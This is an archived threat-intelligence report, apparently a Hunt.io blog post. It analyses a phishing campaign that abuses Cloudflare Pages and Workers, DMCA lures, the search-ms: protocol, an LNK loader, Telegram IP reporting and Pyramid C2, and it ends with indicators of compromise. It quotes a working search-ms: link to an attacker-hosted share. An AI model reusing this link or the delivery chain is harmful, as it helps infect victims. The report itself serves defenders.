{
	"id": "075d83cd-0403-4df8-84f0-7da7f4c66659",
	"created_at": "2026-04-06T00:08:49.385933Z",
	"updated_at": "2026-04-10T03:20:00.472008Z",
	"deleted_at": null,
	"sha1_hash": "d2c5fdfc8ed005186040e01d1fdfe0774abbbe84",
	"title": "Russian-Speaking Threat Actor Abuses Cloudflare \u0026 Telegram in Phishing Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 18729182,
	"plain_text": "Russian-Speaking Threat Actor Abuses Cloudflare \u0026 Telegram in Phishing Campaign\r\nPublished: 2025-04-01 · Archived: 2026-04-05 13:40:10 UTC\r\nIn a follow-up to our previously reported activity involving phishing lures impersonating the Electronic Frontier Foundation, Hunt.io researchers have observed a new wave of attacks attributed to the same Russian-speaking threat actor. This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital Millennium Copyright Act) takedown notices served across multiple domains.\r\nThe lure abuses the search-ms: protocol to download a malicious LNK file disguised as a PDF via a double extension. Once executed, the malware checks in with an attacker-operated Telegram bot, sending the victim's IP address, before transitioning to Pyramid C2 to control the infected host. This notable shift in tactics is likely due to increased scrutiny following the public spotlight on their activity.\r\nThis update covers the phishing lures, infrastructure, and recurring OPSEC lapses, most notably open directories that continue to expose the actor's operations.\r\nDiscovery of Another Open Directory\r\nReaders may remember that in our March 4th post, we used AttackCapture™ to identify the open directory. This time, we'll leverage the File Name feature to search for servers exposing files at the /documents/files/ path covered previously.\r\nhttps://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2\r\nPage 1 of 10\n\nFigure 1: Hunt AttackCapture™ File Name search results for '/documents/files/'\r\nOn March 24th, Hunt scans identified a new server at 104.245.241[.]157, which showed characteristics consistent with infrastructure previously attributed to the actor. 
Hosted on the Railnet LLC network, the server exposed ports 22, 80 (open directory), and 443. As we can see in the above screenshot, many of the file names were reused; however, the contents were changed.\r\nThrough additional scanning, we identified over 20 domains using the new open directory to download malicious files.\r\nCloudflare Pages.Dev \u0026 Workers.Dev Lures\r\nThe domains we observed all sat under Cloudflare's 'workers.dev' or 'pages.dev' parent domains. Cloudflare Pages allows developers to deploy static websites directly from repositories, while Workers enables serverless JavaScript execution. Both are commonly used for legitimate purposes but were abused to serve pages impersonating secure document sharing in this case.\r\nMost web pages referenced cgtrader[.]com, an online marketplace for 3D models. As we previously discussed, the actor likely targeted individuals from a specific community, this time with a DMCA takedown notice, possibly attempting to pressure users under the guise of copyright enforcement.\r\nA complete list of the domains we encountered can be found at the end of this post.\r\nFigure 2: Example phishing page.\r\nClicking the \"Get Document\" button initiates the download chain. The page displays a progress message intended to reinforce legitimacy:\r\n\"A Windows Explorer window will appear shortly. Click 'Open' and wait for the file to be retrieved from our secure server. 
P\r\nReviewing the source code of the HTML reveals additional details about the infection chain.\r\nFigure 3: Snippet of the HTML source from https://devgrid-72kx[.]pages[.]dev.\r\nBeneath the interface, the site uses JavaScript to dynamically request a second-stage link from a Cloudflare Workers subdomain (https[:]//idufgljr[.]procansopa1987[.]workers[.]dev/get-link). The response is a JSON payload containing a search-ms: protocol link:\r\n{\"link\":\"search-ms:query=references.pdf.\u0026crumb=location:%5C%5C213.209.150.191@80%5Cdocuments%5Cfiles\u0026displayname=Network\"}\r\nAfter URL decoding, this becomes:\r\nsearch-ms:query=references.pdf.\u0026crumb=location:\\\\213.209.150.191@80\\documents\\files\u0026displayname=Network\r\nThis opens a File Explorer window titled \"Network\" and performs a search for references.pdf. within the remote share at \\\\213.209.150[.]191@80\\documents\\files. During dynamic analysis, we observed a decoy PDF opened in Microsoft Edge while the malicious LNK executed in the background, leading to infection without further user interaction.\r\nThe use of search-ms: allows threat actors to proxy requests to malicious content through legitimate system interfaces. While this technique is not new, it continues to evade detection in environments where protocol handlers like search-ms: are not monitored or restricted.\r\nAs of publication time, we could not extract additional details about 213.209.150[.]191, but the server plays a role in the attackers' delivery infrastructure.\r\nFile Analysis\r\nThe core infection chain observed in this campaign mirrors earlier activity attributed to the same actor. Execution begins with a Windows shortcut (.lnk) file masquerading as a PDF. 
When launched, the LNK executes a PowerShell script to download a ZIP archive from the actor's malicious infrastructure. The archive contains a legitimate python.exe binary alongside a malicious Python script, which is executed to establish communication with Pyramid C2.\r\nWhile this delivery process remains consistent, several files within the open directory show incremental changes that we will discuss below.\r\nFigure 4: Screenshot of the open directory at 104.245.241[.]157 in Hunt.\r\nkozlina2.ps1\r\nOut of all the files in the directory, kozlina2.ps1, a PowerShell loader responsible for initiating the second stage of the infection chain, caught our eye. This script is executed by references.pdf.lnk, the initial shortcut file delivered via the search-ms: lure.\r\nOnce executed, the script downloads a decoy PDF and a ZIP archive from the open directory. The archive contains a legitimate python.exe binary, multiple dependency files, and a Python-based loader. Upon extraction, a shortcut to the Python script, which includes the Pyramid C2 config, is created and copied to the Windows startup folder to maintain persistence across system reboots.\r\nWhere things differ is the integration of Telegram. kozlina2.ps1 uses a hardcoded Telegram bot token and chat ID to send the external IP address of the infected host to the attacker using the Bot API. The IP is obtained via a call to the ip-api[.]com service.\r\nFigure 5: Snippet of the PowerShell script, kozlina2.ps1.\r\nDue to the hardcoded credentials, we were able to pivot and gather limited details about the operators behind the channel.\r\nThe group title is \"ПШ КОД ЗАПУСК\", which translates from Russian to \"PS CODE LAUNCH\", a likely reference to the kozlina2 script. 
Using the API metadata, researchers were able to identify the following accounts connected to the group:\r\n@tyyndrabot - The bot used to receive IP addresses from infected hosts.\r\n@pups2131 - The group's administrator.\r\nSkandi - A group member; their role remains unknown at this time.\r\nFigure 6: Screenshot from Telegram of the group tied to the malicious phishing attack.\r\nkursor.py\r\nThe ZIP archive retrieved by kozlina.ps1 also contains kursor.py, a Python script functionally consistent with previous iterations covered in our earlier reporting. The script maintains the same role: decoding two configuration blocks that point to Pyramid C2 servers over port 443, including the previously identified 212.87.222[.]84 and the open directory server at 104.245.241[.]157.\r\nAlthough the overall logic remains the same, the actor introduced an additional obfuscation step to the configuration information. In earlier versions, the configuration was base64-encoded and zlib-compressed, making decoding straightforward with tools like CyberChef.\r\nThe updated code now prepends five junk characters to the string before decoding begins. 
The reason for this is not immediately evident to us, but decoding works the same way once the junk string is stripped prior to decoding and decompressing.\r\nFigure 7: Screenshot of kursor.py showing the addition of junk characters to the configuration string.\r\nConclusion\r\nThis latest activity demonstrates the continued evolution of a previously reported Russian-speaking threat actor. While the overall delivery and malware execution processes remain the same, integrating Telegram-based IP reporting, additional obfuscation of Pyramid C2 configs, and using Cloudflare phishing lures reflect ongoing efforts to evade detection and frustrate analysis.\r\nThese incremental changes reinforce the importance of revisiting known tactics and infrastructure over time. Defenders should monitor for abuse of protocol handlers like search-ms:, track open directories serving staged payloads, and remain alert to trusted services, such as Telegram and Cloudflare Workers, being used to mask early-stage activity.\r\nNetwork Observables and Indicators of Compromise (IOCs)\r\nHost Observables and Indicators of Compromise (IOCs)\r\nFilename  SHA-256\r\nkozlina2.ps1  b542033864dd09b2cff6ddec7f19ac480ab79e742481a14ae345051d323f58e7\r\nreferences.pdf.lnk  bf3b19c30085a9611650aa283856bf3defec894aae0b303ccf90244746127206\r\nterms-of-service.pdf.lnk  9103211fc44a4918591106e8bfa73c3d3cc1fa98512fa31aa87423f7a7c51825\r\nkursor.py  be35ed6d513f06c1016a769ea6db7ee30a93b9a28ba39ecde832273833dc5b51\r\nKursorResources.lnk  3b45369da19e3c30e0baf15b3499d119cf812a0e6c2b37b64620340b27decbe3\r\nKursorResources.zip  d9afee5fc0039d6428ca7bc8d5e309cafdcd905b8e4d8843e6d21a89e2b25630\r\nSource: https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2"
	],
	"report_names": [
		"russian-actor-cloudflare-phishing-telegram-c2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434129,
	"ts_updated_at": 1775791200,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2c5fdfc8ed005186040e01d1fdfe0774abbbe84.pdf",
		"text": "https://archive.orkl.eu/d2c5fdfc8ed005186040e01d1fdfe0774abbbe84.txt",
		"img": "https://archive.orkl.eu/d2c5fdfc8ed005186040e01d1fdfe0774abbbe84.jpg"
	}
}